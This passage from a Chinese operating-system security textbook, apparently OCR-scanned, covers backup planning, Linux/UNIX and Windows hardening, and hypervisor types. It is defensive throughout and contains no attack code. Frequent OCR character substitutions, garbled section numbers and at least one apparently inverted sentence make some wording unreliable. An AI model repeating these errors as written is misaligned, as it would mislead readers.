对 能 访问 过 去 数据 的 要 求 。 尽 管 不 同 组 织 有 不 同 的 需求 ， 但 这 两 个 过 程 一 般 是 连 在 一 起 的 。 

与 备份 和 存档 相关 的 需求 和 策略 应 该 在 系统 规划 阶段 确定 好 。 其 中 的 一 些 关键 决策 包括 备 
份 信息 是 在 线 保存 还 是 离线 保存 ， 本 地 保存 还 是 传输 到 远程 服务 器 中 。 需 要 在 实现 的 便利 性 、 
花费 同 应 对 威胁 时 的 安全 性 、 健 壮 性 之 间 做 出 权衡 。 

在 这 方面 缺乏 考虑 的 后 果 有 一 个 很 好 的 例子 ， 在 2011 年 年 初 ， 澳 大 利 亚 主机 提供 商 遭 遇 
了 攻击 ,攻击 者 不 仅 破坏 了 几 千 个 在 线 站 点 ， 同 时 也 破坏 了 它们 的 在 线 备份 。 结 果 是 许多 没有 
对 自己 网 站 进行 备份 的 站 长 丢失 了 网 站 的 所 有 内 容 和 数据 ， 给 站 长 和 主机 提供 商都 造成 了 严重 
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损失 。 另 外 的 例子 是 ， 许 多 只 进行 现场 备份 的 组 织 由 于 IT 中 心 的 火灾 或 者 洪水 就 丢失 了 全 部 
的 数据 。 所 以 一 定 要 对 风险 进行 适当 的 评估 。 


12.6 Linux/UNIX 安全 


前 面 已 经 讨论 了 增强 操作 系统 安全 性 的 过 程 ， 即 谨慎 的 安装 、 配 置 和 管理 。 现 在 我 们 要 介 
绍 这 个 过 程 中 与 UNIX 和 Linux 系统 相关 的 特定 方面 。 除 去 本 节 中 一 般 意 义 上 的 指导 ， 我 们 也 
会 在 第 25 章 中 Linux 安全 机 制 部 分 给 出 一 个 更 为 详细 的 讨论 。 

目前 有 许多 可 用 的 资源 帮助 这 些 Linux 系统 管理 员 ， 包 括 像 [NEME10] 这 样 的 文章 ， 像 
“Linux 文档 项 目 ” 这 样 的 在 线 资源 ， 以 及 像 “NSA : 安全 配置 指南 ”这 样 的 特定 的 系统 加 固 
指南 。 这 些 资源 都 可 以 作为 系统 安全 规划 过 程 中 的 参考 来 协助 确认 系统 的 安全 需求 。 


12.6.1 补丁 管理 


确保 系统 和 应 用 都 打上 了 最 新 的 安全 补丁 是 被 广泛 接受 的 维护 系统 安全 的 重要 方法 。 

现代 UNIX 和 Linux 发 布 版 通常 都 包含 了 自动 化 工具 来 下 载 和 安装 包括 安全 更 新 在 内 的 
软件 更 新 。 及 时 更 新 可 以 尽 可 能 地 减少 系统 因 已 知 漏洞 而 变 得 脆弱 的 时 间 。 例 如 ，Red Hat, 
Fedora 及 CentOS 包含 了 up2date 或 者 yum; SuSE 包含 了 yast; Debian 则 使 用 apt-get， 这 要 求 
我 们 必须 为 自动 更 新 设置 一 个 定时 作业 。 无 论 该 发 布 版 使 用 什么 样 的 更 新 工具 ， 配 置 它们 来 定 
时 安装 关键 的 安全 补丁 都 是 十 分 重要 的 。 

正如 先前 所 提 到 的 ， 不 进行 自动 更 新 的 高 可 用 性 系统 (由 于 可 能 会 引起 系统 不 稳定 ) 应 该 
在 将 测试 系统 部 署 到 生产 系统 之 前 对 所 有 的 补丁 进行 验证 。 


12.6.2 ”应 用 和 服务 配置 


UNIX 和 Linux 上 应 用 和 服务 的 配置 普遍 使 用 单独 的 文件 来 实现 ， 每 一 个 应 用 和 服务 都 有 
独立 的 配置 文件 。 全 系统 的 配置 信息 一 般 位 于 /etc HRF, 或 者 位 于 应 必用 的 安装 目录 中 。 在 每 
个 用 户 的 home 目录 中 ， 用 户 个 人 的 配置 可 以 覆盖 隐藏 在 “.” 文 件 中 系统 的 默认 配置 。 这 些 
文件 的 名 字 、 格 式 、 用 法 因 系 统 版 本 和 应 用 的 不 同 而 各 不 相同 。 因 此 ， 负 责 加 固 系统 中 这 些 配 
置 的 管理 员 应 该 接受 过 适当 的 培训 并 熟悉 它们 。 

通常 ， 这 些 文件 可 以 用 文本 编辑 带 进 行 编辑 ， 发 生 的 任何 更 改 会 在 系统 重启 后 生效 ,或 者 
也 可 以 通过 向 系统 发 送信 号 要 求 相 关 进 程 重新 初始 化 来 生效 。 现 在 的 系统 通常 为 这 些 配 置 文件 
提供 一 个 图 形 界面 来 方便 新 手 管理 员 的 管理 工作 。 这 种 管理 方法 比较 适合 只 拥有 几 个 系统 的 小 
型 站 点 。 对 于 拥有 庞大 系统 的 组 织 ， 则 应 该 部 署 某 种 形式 的 中 央 管 理 设备 ， 有 一 个 中 央 配 置 仓 
库 来 自动 定制 和 分 发 它们 管理 的 系统 。 

增强 系统 安全 性 最 重要 的 措施 是 禁用 服务 ， 尤 其 是 禁用 不 需要 的 远程 访问 服务 ， 并 且 确 保 
所 有 的 服务 和 应 用 根据 相应 的 安全 指导 进行 了 合适 的 配置 。 我 们 将 在 25.5 节 深 入 讨论 这 个 问题 。 


12.6.3 用户、 组 和 权限 


正如 我 们 在 4.5 节 和 25.3 节 描 述 的 ，UNIX 和 Linux 系统 实现 了 对 所 有 文件 系统 资源 的 访 
问 控制 ， 不 仅 包 括 文件 和 目录 ， 也 包括 设备 、 进 程 、 内 存 等 大 多 数 系统 资源 。 如 图 4-5 所 示 ， 
每 一 个 用 户 、 组 和 其 他 人 对 每 一 个 资源 的 权限 都 分 为 读 、 写 、 执 行 三 种 。 这 些 可 以 通过 chmod 
命令 来 设置 。 一 些 系统 也 支持 通过 访问 控制 列表 来 扩展 文件 属性 ， 通 过 指定 用 户 或 组 的 列表 上 
的 每 一 条 记录 的 权限 来 实现 更 灵活 的 访问 控制 ， 这 种 访问 控制 列表 通常 使 用 getfacl 和 setfacl 
命令 来 设置 。 这 些 命令 可 以 用 来 设 定 用 户 或 组 对 资源 的 操作 权限 。 
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依据 惯例 ， 用 户 账户 和 组 的 相关 信息 保存 在 /etc/passwd 目录 和 /etc/group 目录 ， 现 代 操 作 
系统 也 可 以 通过 LDAP 或 NIS 等 工具 导入 这 些 信息 。 这 些 信息 的 来 源 、 相 关 认 证 证 书 的 来 源 
是 在 PAM (可 插 拔 认证 模块 ) 配置 过 程 中 指定 的 ,通常 使 用 /etc/pam.d 目录 。 

为 了 分 开 对 系统 中 信息 和 资源 的 访问 ， 用 户 通常 被 分 配 到 合适 的 组 并 给 予 其 所 需 的 访问 权 
限 。 组 的 数量 和 分 配 应 该 在 系统 安全 规划 过 程 中 确定 ， 随 后 配置 到 合适 的 信息 仓库 中 ， 仓 库 或 
者 在 本 地 的 /etc 目录 中 ， 或 者 在 一 些 中央 数 据 库 中 。 此 时 ， 任 何 默认 或 系统 提供 的 通用 账户 都 
应 该 被 检查 ， 如 果 不 需 要 就 删除 掉 。 其 他 需要 却 不 必 登 录 的 账户 ， 应 该 禁止 其 登录 权限 ， 相 关 
的 密码 和 认证 证 书 也 要 同时 删除 。 

加 固 UNIX 和 Linux 系统 的 指导 通常 也 建议 更 改 关键 目录 和 文件 的 访问 权限 ， 以 进一步 限制 
对 它们 的 访问 。 能 更 改 用 户 (setuid) 或 者 更 改组 (setgid) 的 程序 是 攻击 者 的 主要 目标 。 正 如 我 们 
在 4.4 节 和 25.3 节 讨 论 的 ， 无 论 谁 来 执行 这 些 程序 ， 都 需要 超级 用 户 权 限 ， 或 者 需要 访问 属于 
特权 用 户 组 的 资源 。 这 种 程序 的 软件 漏洞 很 容易 被 攻击 者 利用 来 提升 其 权限 ， 这 称 为 本 地 攻击 
(local exploit)。 网 络 服务 器 中 的 软件 漏洞 被 攻击 者 触发 并 利用 ， 称 为 远程 攻击 (remote exploit)。 

人 们 普遍 认为 通过 setuid 更 改 为 超级 用 户 (root) 的 程序 应 该 尽 可 能 少 。 因 为 访问 系统 中 
的 某 些 资 源 需要 超级 用 户 权 限 ， 因 此 这 类 程序 不 能 完全 没有 。 管 理 用 户 登录 的 程序 ， 或 者 将 网 
络 服务 绑 定 到 特权 端口 的 程序 就 是 很 好 的 例子 。 然 而 ， 其 他 那些 仅仅 为 了 程序 员 编 程 方便 而 更 
改 到 root 权限 的 程序 ， 完 全 可 以 通过 setgid 将 其 更 改 到 特权 组 ， 比 如 显示 系统 状态 或 者 发 邮件 
的 程序 。 系 统 加 固 指导 可 能 会 建议 在 特定 系统 上 ， 更 改 或 移 除 这 类 不 必要 的 程序 。 


12.6.4 远程 访问 控制 


考虑 到 人 们 对 远程 攻击 的 关注 ， 对 仅 有 的 那些 需要 远程 访问 的 服务 进行 访问 限制 是 十 分 重 
要 的 。 正 如 第 9 章 所 言 ， 使 用 一 个 外 围 防火 墙 可 以 提供 这 类 功能 。 然 而 ， 基 于 主机 的 防火 墙 和 
网 络 访问 控制 机 制 也 可 以 提供 额外 的 防护 。UNIX 和 Linux 系统 对 上 面 几 种 选择 都 是 支持 的 。 

TCP Wrappers 库 和 tcpd 守护 进程 提供 了 一 种 网 络 服务 器 可 能 会 用 到 的 机 制 ， 即 轻 量 级 服 
务 可 能 会 被 tcpd 进行 封装 ， 之 后 代替 它 监 听 请 求 。 在 对 请 求 进 行 响应 和 处 理 前 ，tcpd 会 根据 
配置 的 访问 策略 来 检查 请 求 是 否 被 允许 ， 被 拒绝 的 请 求 会 被 记录 下 来 。 较 复杂 或 者 重量 级 的 服 
务 会 使 用 TCP Wrappers 库 和 相同 的 策略 配置 文件 来 将 这 种 功能 安排 进 自 身 的 连接 管理 代码 中 。 
这 些 文件 有 /etc/hosts.allow 和 /etc/hosts.deny， 可 以 根据 需要 的 策略 来 设置 。 409 

有 几 种 主机 防火 墙 程序 也 可 以 使 用 。Linux 系统 最 初 使 用 iptables 程序 来 配置 netfilter AK 
模块 。 这 种 方式 虽然 复杂 ， 但 还 是 提供 了 可 理解 的 状态 包 过 滤 、 监 控 和 修改 功能 。 大 多 数 系统 
是 通过 提供 管理 工具 来 生成 常见 的 配置 并 且 选 择 哪 些 服 务 可 以 访问 系统 。 考 虑 到 运行 程序 和 编 
辑 配置 文件 所 需要 的 技能 和 知识 ， 除 非 有 非 标 准 (non-standard) 的 需求 ， 否 则 还 是 应 该 使 用 这 
些 管理 工具 。 


12.6.5 日 志 记 录 和 日 志 深 动 


大 多 数 应 用 都 会 不 同 程度 地 记录 日 志 ， 记 录 程 度 从 “调试 ”( debugging) (NARA) 到 
“无 ”(none)。 通 常 最 好 选择 中 间 程 度 的 设 定 。 男 外 ， 我 们 不 应 该 假设 默认 的 设置 是 合适 的 。 

此 外 ， 许 多 应 用 允许 我 们 指定 一 个 专用 文件 来 记录 应 用 的 事件 数据 ， 或 者 也 可 以 使 用 系统 
日 志 将 数据 写 入 到 /dev/log (参见 25.5 节 )。 如 果 你 希望 用 一 种 统一 的 、 中 央 化 的 方式 来 处 理 日 
志 ， 那 么 通常 较 好 的 做 法 是 把 应 用 的 日 志 写 到 /dev/log。 然 而 ， 需 要 注意 的 是 ，logrotate (25.5 
节 有 所 讨论 ) 可 以 用 来 滚动 系统 中 的 任何 日 志 ， 不 论 它 是 syslogd 写 的 ， 还 是 Syslog-NG 写 的 ， 
抑或 是 个 人 应 用 程序 写 的 。 
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12.6.6 ”使 用 chroot 监牢 的 应 用 安全 


一 些 网 络 服务 并 不 要 求 访 问 全 部 的 系统 ， 而 是 只 要 求 访 问 有 限 的 一 些 数据 文件 和 目录 。 
FTP 就 是 这 类 服务 的 一 个 稼 见 例子 。 它 提供 了 在 一 个 特定 目录 下 上 传 和 下 载 文件 的 功能 。 如 果 
这 类 服务 具有 全 系统 的 访问 权限 ， 一 且 它 被 攻破 ， 那 么 攻击 者 很 有 可 能 访问 和 破坏 其 他 地 方 的 
数据 。UNIX 和 Linux 系统 提供 了 一 种 机 制 ， 即 将 这 类 服务 运行 在 chroot 监牢 中 ， 此 模式 限制 
了 服务 对 系统 的 可 见 性 ， 使 其 只 能 看 到 系统 的 一 部 分 。 这 种 功能 通过 使 用 chroot 系统 调用 来 实 
现 。chroot 系统 调用 通过 将 “/” 目 录 映 射 到 其 他 目录 (如 /srv/ftp/public) 来 将 进程 局 限 在 文件 
系统 的 一 个 子 集 中 。 对 于 被 限制 的 服务 ，chroot 监牢 中 的 所 有 东西 都 和 “真实 ”的 目录 一 样 ， 
例如 ，/srv/ftp/public/etc/myconfigfile 表现 为 /etc/myconfigfile。chroot 监牢 外 部 的 文件 (如 /srv/ 
www 或 /etc) 是 根本 不 可 见 并 且 无 法 访问 到 的 。 

因此 这 种 技术 有 助 于 控制 被 破坏 或 者 被 劫 持 的 服务 所 珊 来 的 影响 。 这 种 方法 的 主要 缺点 是 
增加 了 复杂 性 : 许多 文件 (包括 服务 器 上 的 所 有 可 执行 库 )、 目 录 以 及 设备 都 需要 拷贝 进 chroot 
监牢 中 。 虽 然 有 许多 详细 的 指导 描述 了 如 何 将 各 种 不 同 的 程序 “ 关 人 监牢 "， 但 决定 需要 将 什 
么 东西 放 和 人 监牢 可 以 让 服务 器 工作 得 更 好 依然 是 一 件 有 麻烦 事 。 

对 一 个 chroot 过 的 应 用 程序 进行 故障 排除 也 是 件 十 分 困难 的 事 。 即 使 某 个 应 用 显 式 地 文 持 
这 种 特性 ， 它 在 监牢 中 也 可 能 表现 出 莫名 其 妙 的 行为 。 另 外 也 应 该 和 注意， 如 果 被 关 入 监牢 的 程 
序 是 以 超级 用 户 权限 运行 的 ， 那 么 它 能 毫 不 费力 地 “打破 ”这 个 监牢 。 尽 管 如 此 ， 将 网 络 服务 
关 和 人 监牢 依然 是 瑕 不 掩 瑜 ， 利 大 于 弊 的 。 


126.7 ”安全 性 测试 


类 似 “NSA : 安全 配置 指南 ”这 类 的 系统 加 固 指导 包含 了 一 些 可 以 遵循 的 UNIX 和 Linux 
系统 检查 清单 。 

也 有 一 些 可 用 的 商业 和 开源 工具 可 以 进行 系统 安全 性 扫描 和 漏洞 检测 。 其 中 一 个 较为 出 名 
的 是 Nessus。 它 最 初 是 一 款 开源 工具 ， 在 2005 年 被 商业 化 了 ， 目 前 有 一 些 受 限制 的 免费 版 本 
可 用 。Tripwire 是 一 款 著 名 的 文件 完整 性 检测 工具 ， 它 维护 了 一 个 受 监控 文件 的 散 列 值 数据 库 ， 
它 能 够 检测 任何 由 恶意 攻击 导致 的 或 者 不 正确 的 管理 和 更 新 导致 的 文件 更 改 。 它 最 初 也 是 开源 
工具 ， 现 在 有 商业 和 自由 软件 两 种 版 本 。Nmap 网 络 扫描 器 是 另外 一 种 著名 的 可 部 署 的 评估 工 
具 ， 它 主要 着 眼 于 识别 和 剂 析 目 标 网 络 中 的 主机 及 其 提供 的 网 络 服务 。 


12.7 Windows 安全 


我 们 现在 来 讨论 安全 地 安装 、 配 置 和 管理 Windows 系统 的 一 些 问 题 。 许 多 年 来 ，Windows 
系统 在 所 有 系统 中 占据 了 极 大 的 份额 ， 因 此 它们 也 受到 了 攻击 者 的 特别 关注 ， 因 此 也 需要 有 
相应 的 安全 措施 来 应 对 这 些 挑战 。 本 章 中 我 们 描述 的 一 般 过 程 仍然 适用 于 为 Windows 系统 提 
供 合适 的 安全 等 级 。 除 去 本 节 提 供 的 一 般 意义 的 指导 之 外 ， 在 后 续 的 第 26 章 还 会 深入 探讨 
Windows 系统 的 安全 机 制 。 

另外 ， 对 于 Windows 管理 员 来 说 ， 也 有 许多 可 用 的 资源 可 以 帮助 他 们 管理 系统 。 包 括 诸 
如 “微软 安全 工具 和 检查 清单 ”这 样 的 在 线 资源 ， 以 及 “NSA: 安全 配置 指南 ”这 种 特定 的 系 
统 加 固 指 导 。 


12.7.1 补丁 管理 


Windows Update 服务 和 Windows Server Update 服务 能 够 帮助 对 微软 软件 进行 定期 维护 ， 
管理 员 应 该 正确 地 配置 和 使 用 这 些 服务 。 许 多 其 他 的 第 三 方 应 用 也 提供 自动 更 新 支持 ， 对 于 选 
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定 的 应 用 ， 也 应 该 启用 这 些 自动 更 新 。 
12.7.2 用户 管 理 和 访问 控制 


Windows 系统 的 用 户 和 组 以 安全 ID (SID) 来 定义 。 这 类 信息 在 单 系统 的 安全 账户 管理 需 
(Security Account Manager, SAM) 中 存储 和 使 用 。 也 可 以 在 属于 同一 个 域 的 组 中 统一 管理 ， 信 
息 是 由 使 用 LDAP 协议 的 中 央 活 动 目录 (Active Directory) 系统 提供 的 。 大 多 数 拥 有 多 个 系统 
的 组 织 都 使 用 域 来 管理 它们 ， 这 些 系统 也 可 以 在 域内 的 任何 用 户 上 实施 常见 的 策略 。 我 们 会 在 
26.1 节 深 入 探讨 Windows 安全 架构 。 

Windows 实现 了 对 系统 资源 的 任意 访问 控制 ， 例 如 文件 、 共 享 内 存 、 命 名 管道 。 访 问 控 
制 列表 上 记录 了 特定 SID 的 访问 权限 ， 这 个 SID 可 能 是 个 人 用 户 ， 也 可 能 是 用 户 组 。Windows 
Vista 和 后 续 的 系统 还 包含 了 强制 的 完整 性 控制 。 所 有 的 对 象 ， 例 如 进程 和 文件 ， 以 及 所 有 的 
用 户 都 被 标记 为 低 、 中 、 高 、 系 统 四 个 等 级 。 这 样 一 来 ， 当 有 数据 写 人 对 象 时 ， 系 统 会 首先 确 
保 当 前 操作 者 的 完整 性 标签 比 被 写 人 的 对 象 高 或 者 相等 。 这 就 实现 了 我 们 在 27.2 节 讨 论 的 某 
种 形式 的 Biba 完整 性 模型 ， 即 对 不 受信 任 的 远程 代码 试图 修改 本 地 资源 (例如 下 浏览 器 ) 的 
行为 保持 特别 关注 。 

Windows 系统 也 定义 了 系统 范围 内 可 以 给 予 用 户 的 特权 。 包 括 备份 计算 机 (要求 覆盖 正常 
的 访问 控制 来 获取 完全 的 备份 )， 或 者 改变 系统 时 间 。 一 些 特权 是 危险 的 ， 攻 击 者 可 以 利用 它 
们 来 破坏 系统 ， 因 此 授权 时 需要 十 分 小 心 。 其 他 权限 相对 比较 温和 ， 可 以 授予 大 多 数 或 者 所 有 
用 户 。 

对 于 任何 系统 来 说 ， 加 固 系 统 配 置 都 包括 深入 限制 系统 中 用 户 和 组 的 权限 和 特权 。 因 为 在 
访问 控制 列表 中 给 出 的 拒绝 访问 设置 具有 更 高 的 优先 级 ， 因 此 你 可 以 显 式 地 设置 一 条 拒绝 记录 
来 阻止 对 某 些 资源 的 未 授权 访问 ， 即 使 要 拒绝 的 用 户 是 有 权 访 问 的 用 户 组 的 一 员 。 

当 需 要 在 共享 资源 上 访问 文件 时 ， 共 享 和 NTFS 权限 的 组 合 可 以 用 来 提供 额外 的 安全 性 和 
粒度 。 例 如 ， 你 可 以 拥有 共享 的 全 部 权限 ， 却 对 其 中 的 文件 只 拥有 读 权限 。 如 果 在 共享 资源 上 
局 用 基于 访问 的 枚 举 ， 那 么 它 能 自动 隐藏 某 一 用 户 无 权 看 到 的 所 有 对 象 。 这 对 包含 了 许多 用 户 
个 人 目录 的 共享 文件 夹 十 分 有 用 。 

我 们 也 应 该 确保 拥有 管理 员 权 限 的 用 户 仅 仅 在 需要 的 时 候 才 使 用 该 权限 ， 而 在 其 他 的 时 候 
则 以 普通 用 户 的 身份 访问 系统 。Vista 和 后 续 的 操作 系统 提供 的 用 户 账户 控制 (UAC) 功能 有 助 
于 实现 这 种 需求 。 这 些 系统 也 提供 了 低 特权 服务 (Low Privilege Service Accounts) 可 用 于 长 期 
使 用 (long-lived) 的 服务 进程 的 能 力 ， 例 如 文件 、 打 印 和 DNS 这 些 不 需要 提升 权限 的 服务 。 


12.7.3 ”应 用 和 服务 配置 


与 UNIX 和 Linux 系统 不 同 ，Windows 系统 的 许多 配置 信息 是 统一 放 在 注册 表 当 中 的 。 注 
册 表 是 一 个 存储 键 和 值 的 数据 库 ， 可 以 被 系统 中 的 应 用 查询 和 解释 。 

如 果 在 特定 的 应 用 中 改变 了 配置 ， 这 些 变化 会 以 键 和 值 的 形式 保存 在 注册 表 中 。 这 种 方 
法 隐藏 了 管理 员 的 管理 细节 。 此 外 ， 注 册 表 的 键 也 可 以 通过 注册 表 编 辑 器 来 更 改 。 这 种 方法 在 
做 大 规模 更 改 的 时 候 更 为 实用 ， 例 如 那些 加 固 指导 中 推荐 的 更 改 。 这 些 改变 也 可 能 会 被 记录 下 
来 ， 之 后 推送 到 网 络 中 的 日 志 系 统 中 。 


12.7.4 其 他 安全 控制 工具 


由 于 以 Windows 系统 为 目标 的 恶意 软件 占据 了 恶意 软件 数量 的 绝 大 多 数 ， 在 这 类 系统 上 
安装 和 配置 反 病 毒 、 反 间谍 、 个 人 防火 墙 以 及 其 他 攻击 检测 和 处 理 软件 是 必 不 可 少 的 。 对 于 有 
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网 络 连接 的 系统 ， 这 些 是 显而易见 的 要 求 ，[SYMA16] 这 样 的 报告 也 显示 了 攻击 的 高 发 态势 。 
然而 ，2010 年 的 震 网 (Stuxnet) 攻击 显示 ， 即 便 是 使 用 可 移 除 媒介 进行 的 独立 系统 升级 也 是 脆 
弱 的 ， 同 样 也 应 该 受到 保护 。 

目前 这 代 Windows 操作 系统 拥有 基本 的 防火 墙 和 恶意 代码 处 置 能 力 ， 但 它们 应 该 很 少 被 
人 们 用 到 。 然 而 ， 许 多 组 织 发 现 一 个 或 多 个 商业 产品 应 该 会 增强 防护 和 处 理 恶 意 代 码 的 能 力 。 
人 们 关心 的 一 个 问题 是 不 同 反 病 毒 产品 之 间 的 相互 影响 。 当 规划 和 安装 这 些 产 品 来 识别 和 检测 
攻击 的 时 候 应 该 十 分 小 心 ， 要 确保 产品 之 间 是 相互 兼容 的 。 

如 果 有 需求 ，Windows 系统 也 支持 广泛 的 加 密 功 能 。 包 括 使 用 加 密 文件 系统 ( EFS) 来 加 
密 文件 和 目录 ,使 用 BitLocker 以 AES 方式 加 密 整 个 磁盘 ， 等 等 。 


12.75 ”安全 性 测试 


“NSA: 安全 配置 指南 ”这 样 的 系统 加 固 指导 也 提供 了 不 同 版 本 Windows 的 安全 检查 
清单 。 

也 有 许多 商业 和 开源 工具 可 以 对 Windows 系统 进行 系统 安全 扫描 和 漏洞 检测 。“ 微 软 基 线 
安全 分 析 器 ”( Microsoft Baseline Security Analyzer) 就 是 一 个 简单 免费 且 易 用 的 工具 ， 它 纺 
通过 检查 系统 是 否 安 装 了 推荐 更 新 以 及 是 否 符 合 微 软 推荐 的 设 定 来 改善 中 小 型 商业 机 构 的 安全 
性 。 大 规模 的 组 织 最 好 使 用 一 个 更 大 的 中 心 化 和 商业 化 的 安全 分 析 套 件 。 


12.8 虚拟 化 安全 


虚拟 化 指 的 是 使 用 某 些 软 件 对 计算 资源 进行 抽象 的 技术 ， 因 此 它 运行 在 称 为 虚拟 机 ( VM) 
的 仿真 环境 当中 。 目 前 有 多 种 形式 的 虚拟 化 ， 本 节 我 们 主要 关注 的 是 全 虚拟 化 。 它 允许 在 虚拟 
硬件 之 上 运行 多 个 完整 的 操作 系统 实例 ， 由 管理 程序 ( hypervisor) 管理 操作 系统 对 实体 硬件 资 
源 的 访问 。 使 用 虚拟 化 技术 的 好 处 是 相 比 运行 单一 操作 系统 而 言 ， 运 行 多 个 操作 系统 实例 可 以 
更 高 效 地 利用 物理 硬件 资源 。 这 种 好 处 在 提供 各 种 虚拟 化 服务 器 方面 尤其 明显 。 虚 拟 化 也 能 为 
在 一 台 物 理 机 上 运行 多 个 独立 的 不 同类 型 的 操作 系统 和 相关 软件 提供 支持 ， 这 在 客户 端 系统 中 
更 为 常见 。 

在 虚拟 化 系统 中 产生 了 许多 额外 的 安全 考虑 ， 这 既是 由 于 多 个 操作 系统 同时 运行 ， 也 是 
由 于 在 操作 系统 内 核 及 其 安全 服务 之 下 又 新 增 了 一 层 虚 拟 环境 和 管理 程序 所 致 。[CLEE09] 给 
出 了 由 于 使 用 虚拟 化 技术 而 产生 的 安全 相关 问题 的 调查 ， 在 这 里 我 们 将 会 深入 讨论 其 中 的 一 些 
问题 。 


12.8.1 虚拟 化 方案 


虚拟 机 管理 器 是 介 于 硬件 与 虚拟 机 之 间 的 充当 资源 代理 的 软件 程序 ， 简 单 来 说 ， 它 允许 多 
个 虚拟 机 在 一 个 物理 服务 右 主 机 上 安全 地 共存 ， 并 共享 该 主机 上 的 资源 。 该 虚拟 化 软件 提供 了 
所 有 物理 资源 的 抽象 化 概念 《如 处 理 器 、 内 存 、 网 络 以 及 存储 设备 )， 并 因此 可 以 在 单个 物理 
主机 上 运行 多 个 被 称 为 虚拟 机 的 计算 堆栈 。 

每 个 虚拟 机 都 包含 一 个 操作 系统 ， 被 称 作 客机 操作 系统 (客户 机 )。 这 个 客户 机 若 存 在 的 
话 可 能 与 主机 操作 系统 是 一 样 的 ， 也 可 能 是 不 同 的 。 例 如 ， 一 个 Windows 的 客户 机 可 能 是 一 
个 在 Linux 主机 操作 系统 上 运行 的 虚拟 机 。 而 反 过 来 ， 客 户 机 也 支持 一 系列 的 标准 库 函 数 、 二 
进 制 文件 和 应 用 程序 。 从 应 用 程序 和 用 户 的 角度 来 看 ， 这 个 堆栈 看 起 来 是 一 个 实际 存在 的 机 
做， 它 既 有 硬件 又 有 操作 系统 ; 因此 ， 虚 拟 机 这 个 术语 是 十 分 恰当 的 。 换 句 话说 ， 它 就 是 一 个 
被 虚拟 化 的 硬件 。 
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虚拟 机 管理 带 执 行 的 主要 功能 如 下 : 
© 虚拟 机 的 执行 管理 : 虚拟 机 执行 管理 包括 调度 虚拟 机 执行 、 确 保 虚 拟 机 与 其 他 虚拟 机 
隅 离 的 虚拟 内 存 管 理 以 及 不 同 处 理 需 状态 之 间 的 上 下 文 切 换 ， 同 时 它 也 包括 隔离 各 个 
虚拟 机 以 防止 资源 使 用 的 冲突 以 及 对 定时 器 和 中 断 机 制 的 模拟 。 
e 设备 模拟 和 控制 访问 : 模拟 所 有 虚拟 机 中 不 同 本 地 驱动 程序 的 网 络 和 存储 GR) 设备 ， 
并 通过 不 同 的 虚拟 机 对 物理 设备 进行 中 介 访 问 。 
e 通过 虚拟 机 管理 器 为 客户 虚拟 机 执行 特权 操作 : 这 是 由 客户 机 调用 的 某 些 操作 ， 这 些 
操作 不 是 由 主机 人 硬件 直接 执行 的 ， 而 是 由 虚拟 机 管理 需 执 行 ， 因 为 它们 具有 特权 性 质 。 
e 虚拟 机 管理 (也 被 称 为 虚拟 机 生命 周期 管理 ) : 配置 客户 虚拟 机 并 控制 虚拟 机 状态 ( 例 
a, 开始、 暂停 、 停 止 )。 
e 管理 虚拟 机 管理 器 平台 与 虚拟 机 管理 器 软件 : 包括 为 用 户 与 虚拟 机 管理 器 主机 (以 及 
用 户 与 虚拟 机 管理 软件 ) 的 交互 设置 参数 。 
一 型 虚拟 机 管理 器 ”虚拟 机 管理 器 有 两 种 类 型 ， 这 两 种 类 型 的 区 别 在 于 虚拟 机 管理 天 与 主 
机 中 间 是 否 存 在 一 个 操作 系统 。 如 图 12-2a 所 示 ， 一 个 一 型 虚拟 机 管理 器 被 直接 加 载 到 物理 服 
务 器 上 ， 就 好 像 加 载 了 一 个 操作 系统 一 样 ; 这 被 称 为 本 地 虚拟 化 (native virtualization ) 。 一 型 
虚拟 机 管理 需 可 以 直接 控制 主机 的 物理 资源 。 一 旦 它 被 安装 上 且 配 置 完 毕 ， 服 务 器 就 可 以 支持 客 
户 虚 拟 机 。 在 成 熟 的 环境 中 ， 虚 拟 主 机 被 聚集 在 一 起 以 提高 可 用 性 和 维持 负载 平衡 ， 虚 拟 机 管 
理 融 就 可 以 被 部 署 在 一 个 新 的 主机 上 。 之 后 我 们 将 新 主机 连接 到 现 有 的 集群 中 ， 这 样 虚拟 机 就 
可 以 在 不 用 中 断 服 务 的 情况 下 移动 到 新 主机 上 。 
二 型 虚拟 机 管理 器 ”二 型 虚拟 机 管理 顺利 用 主 操作 系统 的 资源 和 功能 ， 并 作为 一 个 软件 模 
块 运行 在 操作 系统 之 上 (如 图 12-2b 所 示 ); 这 被 我 们 称 作 主机 虚拟 化 ( hosted virtualization ) 。 
它 依赖 于 操作 系统 来 代表 虚拟 机 管理 程序 处 理 上 所有 的 硬件 交互 。 


虚拟 机 
虚拟 机 





a) 一 型 虚拟 机 管理 器 b) 二 型 虚拟 机 管理 器 
(本 地 虚拟 化 ) (主机 虚拟 化 ) 





c) 容器 ( 应 用 程序 虚拟 化 ) 
图 12-2 ”虚拟 机 和 容 需 的 对 比 


两 种 虚拟 机 管理 需 的 关键 差异 如 下 : 
。 最 具 代 表 性 的 是 ， 一 型 虚拟 机 管理 器 比 二 型 表现 更 好 ， 因 为 一 型 虚拟 机 管理 需 不 会 与 
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操作 系统 竞争 资源 ， 这 样 主机 上 就 会 有 更 多 的 可 用 资源 ， 并 且 通 过 拓展 ， 更 多 的 虚拟 
机 可 以 使 用 一 型 虚拟 机 管理 器 在 虚拟 化 服务 器 上 托管 。 
o 一 型 虚拟 机 管理 帮 同 时 也 被 认为 比 二 型 更 加 安全 。 一 型 虚拟 机 管理 人 副 上 运行 的 虚拟 机 
会 做 出 被 外 部 处 理 的 资源 请 求 ， 而 且 它 们 不 会 影响 到 其 他 虚拟 机 或 者 其 他 支持 它们 的 
虚拟 机 管理 器 。 但 是 对 于 二 型 虚拟 机 管理 器 却 并 不 一 定 是 这 样 ， 并 且 一 个 恶意 的 访客 
可 能 会 造成 比 它 自 身 更 大 的 潜在 影响 。 
二 型 虚拟 机 管理 器 允许 用 户 利用 虚拟 化 ， 而 不 需要 将 服务 器 专门 用 于 该 功能 。 需 要 运 
行 多 个 开发 环境 作为 其 进程 一 部 分 的 开发 者 ， 除 了 利用 PC 操作 系统 提供 的 个 人 生产 
工作 空间 之 外 ， 还 可 在 他 们 的 Linnx、MacOSX 或 者 Windows 桌面 上 安装 作为 应 用 程 
序 的 二 型 虚拟 机 管理 器 。 被 创建 并 使 用 的 虚拟 机 可 以 从 一 个 虚拟 机 管理 器 环境 迁移 或 
复制 到 另 一 个 虚拟 机 管理 器 环境 中 ， 这 样 不 仅 可 以 减少 部 署 时 间 ， 提 高 部 署 的 准确 性 ， 
还 可 以 减少 投放 项 目的 时 间 。 

